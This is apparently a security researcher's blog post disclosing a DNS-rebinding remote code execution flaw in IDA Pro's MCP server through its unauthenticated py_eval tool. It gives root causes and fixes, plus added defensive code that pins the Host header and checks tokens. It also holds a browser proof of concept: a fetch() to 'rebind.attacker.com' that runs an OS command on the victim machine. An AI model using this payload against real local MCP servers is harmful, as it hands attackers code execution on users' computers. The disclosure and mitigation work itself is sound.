RaaX's Blog


While reproducing the ray-project/ray vulnerability (CVE-2025-62593), I realized that the same attack model applies directly to the IDA MCP interface, which I frequently use.

Summary

IDA Pro’s Machine Control Protocol (MCP) exposes a JSON‑RPC interface on 127.0.0.1:13337. When the py_eval tool is enabled, the MCP server will execute arbitrary Python code received in the HTTP request body.

Because the MCP endpoint lacks authentication, CORS validation, and browser‑origin protections, a malicious webpage can execute Python code on the user’s machine by abusing DNS rebinding. This results in full remote code execution (RCE) in the context of the user running IDA Pro.

This issue is similar in nature to the Ray project’s advisory: GHSA‑q279‑jhrf‑cc6v.

Impact

A remote attacker can:

  • Run arbitrary Python code with the user’s permissions
  • Execute OS commands (e.g., via os.system)
  • Access/modify files on disk
  • Interact with IDA APIs, extract data, modify analysis, etc.
  • Fully compromise the host environment

Severity: Critical (RCE)

Root Causes

  1. py_eval executes arbitrary Python code from the request body without validation.
  2. MCP HTTP API accepts requests from any browser origin.
  3. No authentication / tokens.
  4. DNS rebinding allows remote attackers to reach 127.0.0.1.

Additional Notes

(1) py_eval is enabled by default

Under a standard MCP startup, py_eval becomes immediately available unless manually disabled.

(2) py_eval can also be enabled via /config.html

Even if disabled initially, a malicious website can load:

http://127.0.0.1:13337/config.html

Then use JavaScript to toggle the py_eval checkbox, because:

  • config.html lacks CSRF protection
  • No origin checks block browser access

This means an attacker can remotely enable py_eval before exploiting it.

Proof of Concept (DNS Rebinding → RCE)

Once DNS rebinding maps an attacker domain to 127.0.0.1, the following browser code achieves RCE:

fetch("http://rebind.attacker.com/mcp", {
  method: "POST",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({
    jsonrpc: "2.0",
    id: 1,
    method: "tools/call",
    params: {
      name: "py_eval",
      arguments: {
        code: "__import__('os').system('calc.exe')"
      }
    }
  })
});

This launches an OS command on the victim machine.

Recommendation

  • Disable py_eval by default
  • Add an authentication token for all MCP requests
  • Block browser origins (strict CORS: Access-Control-Allow-Origin: none)
  • Add CSRF protection to config.html
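
A request gate covering the token and origin recommendations, as an added example (not code from the IDA MCP project or from this post). It also pins the Host header, which goes beyond the list above: after DNS rebinding the browser treats the request as same-origin, so CORS response headers are never consulted, while the Host header still carries the attacker's name. The names `authorize`, `ALLOWED_HOSTS`, `ALLOWED_ORIGINS` and `SESSION_TOKEN` and the bearer-token scheme are assumptions.

```python
import hmac
import secrets

# Assumptions for illustration: the port is the one named on the page;
# the names and the token scheme are hypothetical, not the project's own.
ALLOWED_HOSTS = {"127.0.0.1:13337", "localhost:13337"}
ALLOWED_ORIGINS = {"http://" + h for h in ALLOWED_HOSTS}
SESSION_TOKEN = secrets.token_urlsafe(32)  # generated once per server start


def authorize(headers, expected_token=SESSION_TOKEN):
    """Return (http_status, reason) for one incoming MCP HTTP request."""
    h = {k.lower(): v.strip() for k, v in headers.items()}

    # 1. DNS rebinding: the socket lands on 127.0.0.1, but the browser still
    #    sends the attacker-controlled name in Host, so pin the Host header.
    if h.get("host", "").lower() not in ALLOWED_HOSTS:
        return 403, "host not allowed"

    # 2. Browser origin: non-browser MCP clients normally send no Origin;
    #    if one is present it must be the server's own origin.
    origin = h.get("origin")
    if origin is not None and origin.lower() not in ALLOWED_ORIGINS:
        return 403, "origin not allowed"

    # 3. Authentication: per-session bearer token, constant-time comparison.
    scheme, _, presented = h.get("authorization", "").partition(" ")
    if scheme.lower() != "bearer" or not hmac.compare_digest(
            presented.encode(), expected_token.encode()):
        return 401, "missing or invalid token"
    return 200, "ok"


if __name__ == "__main__":
    # Constructed sample requests (headers only), not captured traffic.
    samples = [
        ("rebound page", {"Host": "rebind.attacker.com:13337",
                          "Origin": "http://rebind.attacker.com:13337"}),
        ("cross-site page", {"Host": "127.0.0.1:13337",
                             "Origin": "http://evil.example"}),
        ("local client, no token", {"Host": "127.0.0.1:13337"}),
        ("local client", {"Host": "127.0.0.1:13337",
                          "Authorization": "Bearer " + SESSION_TOKEN}),
    ]
    for label, hdrs in samples:
        print(f"{label:24} -> {authorize(hdrs)}")
```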

PoC video

IDA Pro MCP RCE Vulnerability via DNS_Rebinding
https://astro-pure.js.org/blog/ida_pro_mcp_vul
Author RaaX
Published at December 1, 2025